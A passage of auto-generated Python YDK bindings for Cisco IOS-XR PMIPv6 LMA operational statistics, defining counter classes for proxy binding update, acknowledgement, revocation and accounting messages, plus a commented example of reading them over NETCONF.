self._child_classes = OrderedDict([("pbu-receive-statistics", ("pbu_receive_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics)), ("pba-send-statistics", ("pba_send_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics)), ("pbri-send-statistics", ("pbri_send_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics)), ("pbri-receive-statistics", ("pbri_receive_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics)), ("pbra-send-statistics", ("pbra_send_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics)), ("pbra-receive-statistics", ("pbra_receive_statistics", Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics))])
self._leafs = OrderedDict()
self.pbu_receive_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics()
self.pbu_receive_statistics.parent = self
self._children_name_map["pbu_receive_statistics"] = "pbu-receive-statistics"
self.pba_send_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics()
self.pba_send_statistics.parent = self
self._children_name_map["pba_send_statistics"] = "pba-send-statistics"
self.pbri_send_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics()
self.pbri_send_statistics.parent = self
self._children_name_map["pbri_send_statistics"] = "pbri-send-statistics"
self.pbri_receive_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics()
self.pbri_receive_statistics.parent = self
self._children_name_map["pbri_receive_statistics"] = "pbri-receive-statistics"
self.pbra_send_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics()
self.pbra_send_statistics.parent = self
self._children_name_map["pbra_send_statistics"] = "pbra-send-statistics"
self.pbra_receive_statistics = Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics()
self.pbra_receive_statistics.parent = self
self._children_name_map["pbra_receive_statistics"] = "pbra-receive-statistics"
self._segment_path = lambda: "protocol-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics, [], name, value)
class PbuReceiveStatistics(Entity):
"""
PBU Receive Statistics
.. attribute:: pbu_count
Count of PBUs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbu_drop_count
Count of PBUs Dropped
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics, self).__init__()
self.yang_name = "pbu-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbu_count', (YLeaf(YType.uint64, 'pbu-count'), ['int'])),
('pbu_drop_count', (YLeaf(YType.uint32, 'pbu-drop-count'), ['int'])),
])
self.pbu_count = None
self.pbu_drop_count = None
self._segment_path = lambda: "pbu-receive-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbuReceiveStatistics, ['pbu_count', 'pbu_drop_count'], name, value)
class PbaSendStatistics(Entity):
"""
PBA Send Statistics
.. attribute:: pba_count
Count of PBAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pba_drop_count
Count of PBAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: accepted_count
Count of Status Code \- Binding Update accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Count of Status Code \- Last BA status code sent
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_failure_count
Count of Status Code \- Reason unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_failure_count
Count of Status Code \- Administratively prohibited
**type**\: int
**range:** 0..4294967295
.. attribute:: resource_failure_count
Count of Status Code \- Insufficient resources
**type**\: int
**range:** 0..4294967295
.. attribute:: home_reg_failure_count
Count of Status Code \- Home registration not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: home_subnet_failure_count
Count of Status Code \- Not home subnet
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_sequence_failure_count
Count of Status Code \- Sequence number out of window
**type**\: int
**range:** 0..4294967295
.. attribute:: reg_type_failure_count
Count of Status Code \- Registration type change
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_failure_count
Count of Status Code \- Auth Fail
**type**\: int
**range:** 0..4294967295
.. attribute:: proxy_reg_not_enabled_count
Count of Status Code \- Proxy Registration not enabled
**type**\: int
**range:** 0..4294967295
.. attribute:: not_lma_for_this_mn_count
Count of Status Code \- Not LMA for this Mobile Node
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_proxy_reg_count
Count of Status Code \- MAG not authorized for proxy registration
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_hnp_count
Count of Status Code \- Not authorized for HNP
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_mismatch_count
Count of Status Code \- Invalid timestamp value
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_lower_than_previous_accepted_count
Count of Status Code \- Timestamp lower than previous accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hnp_opt_count
Count of Status Code \- Missing Home Network Prefix option
**type**\: int
**range:** 0..4294967295
.. attribute:: received_hnps_do_not_match_bce_hnps_count
Count of Status Code \- Received HNPs do not match with BCE
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_mn_id_opt_count
Count of Status Code \- Missing MN identifier option
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hi_opt_count
Count of Status Code \- Missing Handoff Indicator
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_access_tech_type_opt_count
Count of Status Code \- Missing ATT option
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_mobility_count
Count of Status Code \- Not authorized for IPv4 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_hoa_count
Count of Status Code \- Not authorized for IPv4 HoA
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv6_mobility_count
Count of Status Code \- Not authorized for IPv6 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: multiple_ipv4_ho_a_not_supported_count
Count of Status Code \- Multiple IPv4 HoA not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: gre_key_opt_required_count
Count of Status Code \- GRE Key option is required
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics, self).__init__()
self.yang_name = "pba-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pba_count', (YLeaf(YType.uint64, 'pba-count'), ['int'])),
('pba_drop_count', (YLeaf(YType.uint32, 'pba-drop-count'), ['int'])),
('accepted_count', (YLeaf(YType.uint32, 'accepted-count'), ['int'])),
('unknown_count', (YLeaf(YType.uint32, 'unknown-count'), ['int'])),
('unspecified_failure_count', (YLeaf(YType.uint32, 'unspecified-failure-count'), ['int'])),
('admin_failure_count', (YLeaf(YType.uint32, 'admin-failure-count'), ['int'])),
('resource_failure_count', (YLeaf(YType.uint32, 'resource-failure-count'), ['int'])),
('home_reg_failure_count', (YLeaf(YType.uint32, 'home-reg-failure-count'), ['int'])),
('home_subnet_failure_count', (YLeaf(YType.uint32, 'home-subnet-failure-count'), ['int'])),
('bad_sequence_failure_count', (YLeaf(YType.uint32, 'bad-sequence-failure-count'), ['int'])),
('reg_type_failure_count', (YLeaf(YType.uint32, 'reg-type-failure-count'), ['int'])),
('authen_failure_count', (YLeaf(YType.uint32, 'authen-failure-count'), ['int'])),
('proxy_reg_not_enabled_count', (YLeaf(YType.uint32, 'proxy-reg-not-enabled-count'), ['int'])),
('not_lma_for_this_mn_count', (YLeaf(YType.uint32, 'not-lma-for-this-mn-count'), ['int'])),
('no_author_for_proxy_reg_count', (YLeaf(YType.uint32, 'no-author-for-proxy-reg-count'), ['int'])),
('no_author_for_hnp_count', (YLeaf(YType.uint32, 'no-author-for-hnp-count'), ['int'])),
('timestamp_mismatch_count', (YLeaf(YType.uint32, 'timestamp-mismatch-count'), ['int'])),
('timestamp_lower_than_previous_accepted_count', (YLeaf(YType.uint32, 'timestamp-lower-than-previous-accepted-count'), ['int'])),
('missing_hnp_opt_count', (YLeaf(YType.uint32, 'missing-hnp-opt-count'), ['int'])),
('received_hnps_do_not_match_bce_hnps_count', (YLeaf(YType.uint32, 'received-hnps-do-not-match-bce-hnps-count'), ['int'])),
('missing_mn_id_opt_count', (YLeaf(YType.uint32, 'missing-mn-id-opt-count'), ['int'])),
('missing_hi_opt_count', (YLeaf(YType.uint32, 'missing-hi-opt-count'), ['int'])),
('missing_access_tech_type_opt_count', (YLeaf(YType.uint32, 'missing-access-tech-type-opt-count'), ['int'])),
('no_author_for_ipv4_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-mobility-count'), ['int'])),
('no_author_for_ipv4_hoa_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-hoa-count'), ['int'])),
('no_author_for_ipv6_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv6-mobility-count'), ['int'])),
('multiple_ipv4_ho_a_not_supported_count', (YLeaf(YType.uint32, 'multiple-ipv4-ho-a-not-supported-count'), ['int'])),
('gre_key_opt_required_count', (YLeaf(YType.uint32, 'gre-key-opt-required-count'), ['int'])),
])
self.pba_count = None
self.pba_drop_count = None
self.accepted_count = None
self.unknown_count = None
self.unspecified_failure_count = None
self.admin_failure_count = None
self.resource_failure_count = None
self.home_reg_failure_count = None
self.home_subnet_failure_count = None
self.bad_sequence_failure_count = None
self.reg_type_failure_count = None
self.authen_failure_count = None
self.proxy_reg_not_enabled_count = None
self.not_lma_for_this_mn_count = None
self.no_author_for_proxy_reg_count = None
self.no_author_for_hnp_count = None
self.timestamp_mismatch_count = None
self.timestamp_lower_than_previous_accepted_count = None
self.missing_hnp_opt_count = None
self.received_hnps_do_not_match_bce_hnps_count = None
self.missing_mn_id_opt_count = None
self.missing_hi_opt_count = None
self.missing_access_tech_type_opt_count = None
self.no_author_for_ipv4_mobility_count = None
self.no_author_for_ipv4_hoa_count = None
self.no_author_for_ipv6_mobility_count = None
self.multiple_ipv4_ho_a_not_supported_count = None
self.gre_key_opt_required_count = None
self._segment_path = lambda: "pba-send-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbaSendStatistics, ['pba_count', 'pba_drop_count', 'accepted_count', 'unknown_count', 'unspecified_failure_count', 'admin_failure_count', 'resource_failure_count', 'home_reg_failure_count', 'home_subnet_failure_count', 'bad_sequence_failure_count', 'reg_type_failure_count', 'authen_failure_count', 'proxy_reg_not_enabled_count', 'not_lma_for_this_mn_count', 'no_author_for_proxy_reg_count', 'no_author_for_hnp_count', 'timestamp_mismatch_count', 'timestamp_lower_than_previous_accepted_count', 'missing_hnp_opt_count', 'received_hnps_do_not_match_bce_hnps_count', 'missing_mn_id_opt_count', 'missing_hi_opt_count', 'missing_access_tech_type_opt_count', 'no_author_for_ipv4_mobility_count', 'no_author_for_ipv4_hoa_count', 'no_author_for_ipv6_mobility_count', 'multiple_ipv4_ho_a_not_supported_count', 'gre_key_opt_required_count'], name, value)
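# --- Illustrative usage (not part of the generated model) -------------------
# The counters declared in the send/receive statistics classes above are
# read-only operational data. A minimal sketch of retrieving them with
# ydk-py's CRUDService over NETCONF follows; the device address, the
# credentials, and the `global_` attribute name (YDK's usual rendering of the
# YANG container "global") are assumptions made only for this example.
#
#     from ydk.services import CRUDService
#     from ydk.providers import NetconfServiceProvider
#     from ydk.models.cisco_ios_xr import Cisco_IOS_XR_ip_mobileip_oper as mobileip_oper
#
#     provider = NetconfServiceProvider(address="192.0.2.1",
#                                       username="admin", password="admin")
#     crud = CRUDService()
#     # Read the operational tree, then drill down to the global PBA send counters.
#     pmipv6 = crud.read(provider, mobileip_oper.Pmipv6())
#     pba = pmipv6.lma.statistics.global_.protocol_statistics.pba_send_statistics
#     print(pba.pba_count, pba.pba_drop_count, pba.accepted_count)
# -----------------------------------------------------------------------------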
class PbriSendStatistics(Entity):
"""
PBRI Send Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User\-Initiated Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics, self).__init__()
self.yang_name = "pbri-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-send-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriSendStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbriReceiveStatistics(Entity):
"""
PBRI Receive Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User\-Initiated Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics, self).__init__()
self.yang_name = "pbri-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-receive-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbraSendStatistics(Entity):
"""
PBRA Send Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics, self).__init__()
self.yang_name = "pbra-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-send-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class PbraReceiveStatistics(Entity):
"""
PBRA Receive Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics, self).__init__()
self.yang_name = "pbra-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-receive-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class AccountingStatistics(Entity):
"""
LMA Accounting Statistics
.. attribute:: accounting_start_sent_count
Count of Accounting Start Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_update_sent_count
Count of Accounting Update Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_stop_sent_count
Count of Accounting Stop Records Sent
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.AccountingStatistics, self).__init__()
self.yang_name = "accounting-statistics"
self.yang_parent_name = "global"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('accounting_start_sent_count', (YLeaf(YType.uint64, 'accounting-start-sent-count'), ['int'])),
('accounting_update_sent_count', (YLeaf(YType.uint64, 'accounting-update-sent-count'), ['int'])),
('accounting_stop_sent_count', (YLeaf(YType.uint64, 'accounting-stop-sent-count'), ['int'])),
])
self.accounting_start_sent_count = None
self.accounting_update_sent_count = None
self.accounting_stop_sent_count = None
self._segment_path = lambda: "accounting-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
